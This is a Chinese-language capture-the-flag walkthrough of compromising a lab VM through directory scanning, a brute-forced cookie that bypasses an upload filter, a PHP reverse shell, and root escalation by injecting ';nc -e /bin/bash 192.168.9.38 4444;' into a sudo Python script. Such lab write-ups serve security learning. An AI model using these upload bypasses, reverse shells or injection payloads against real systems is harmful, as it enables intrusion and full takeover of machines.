文章妙语
遇事不决,可问春风;
春风不语,遵循己心。
文章目录
- 文章妙语
- 前言
- 一、信息收集
- 1.IP地址扫描
- 2.端口扫描
- 3.目录扫描
- 二,漏洞发现
- 分析代码
- bp爆破
- 1.生成字典
- 2.生成恶意shell.php
- 2.抓包
- 三,漏洞利用
- 1.反弹shell
- 四,提权
- 五,总结
前言
本文记录一个大学生如何辛辛苦苦升级打怪的奇异过程
一、信息收集
1.IP地址扫描
2.端口扫描
发现了 192.168.9.44 开放的端口是80,22
3.目录扫描
dirsearch -u "http://192.168.9.44"
gobuster dir -u http://192.168.9.44 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,bak,html,txt
二,漏洞发现
访问刚刚扫描出的目录,发现有文件上传/dashboard.html,还有我们存储上传文件的目录/owls,还有一个/ajax.php是一个空白页面,看了大佬的wp发现后面要加.bak,访问/ajax.php.bak,就得到代码
分析代码
代码如下,意思就是让我们在数据包中加cookie字段和POST数据secure=val1d,爆破到真正的字母,就可以上传php文件
cookie:admin=&G6u@B6uDXMq&Ms 在bp中Ms后面加一个大写字母,进行爆破
Content-Disposition: form-data; name="secure";
val1d
//The boss told me to add one more Upper Case letter at the end of the cookie
老板让我在cookie的末尾再加一个大写字母
if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
//[+] Add if $_POST['secure'] == 'val1d'
$valid_ext = array("pdf","php","txt");
}
else{
$valid_ext = array("txt");
}
// Remember success upload returns 1
记住成功上传返回1
bp爆破
1.生成字典
这里我推荐kali中自带的工具----------crunch
使用方法:
生成字典:crunch 最小长度 最大长度 -t 占位符
我要生成四位纯数字
crunch 4 4 -t %%%%
@ 代表小写字母
, 代表大写字母
% 代表数字
^ 代表特殊字符
2.生成恶意shell.php
反弹shell地址
如下要先配置好地址和端口
2.抓包
抓到的包
修改后的包
cookie:admin=&G6u@B6uDXMq&MsA
-----------------------------236152418788651125143816458 这个直接复制下面的,每个包不一样
Content-Disposition: form-data; name="secure";
val1d
-----------------------------236152418788651125143816458
发送给爆破模块,intruder
添加字典
爆破,发现R的回显是1,说明上传成功
直接将这个包发给重发模块
将A改为R ,点send ,回显1,发送成功
三,漏洞利用
1.反弹shell
上传成功后:
先在kali上监听端口
nc -lvvp 6666
在访问/owls,点击shell.php
四,提权
找到一个flag,还有athena用户的密码,在网上查到[Asterisk]是*
所以passwd:myvulnerableapp*
使用ssh连接athena
发现一个python文件,具有root权限,cat一下
就是说运行py,需要我们输入,然后脚本需要回显,就会以bash命令执行,所以我们写一个nc反弹shell
sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
nc -lvvp 4444
;nc -e /bin/bash 192.168.9.38 4444; 注意nc前面,后面都要带';',';'代表执行完前一个,执行后一个命令
五,总结
打靶场打累了,怎么办,那就看约尔小姐;
学习学累了,怎么办,那就看约尔小姐;
约尔小姐,可以缓解你的一切疲劳。
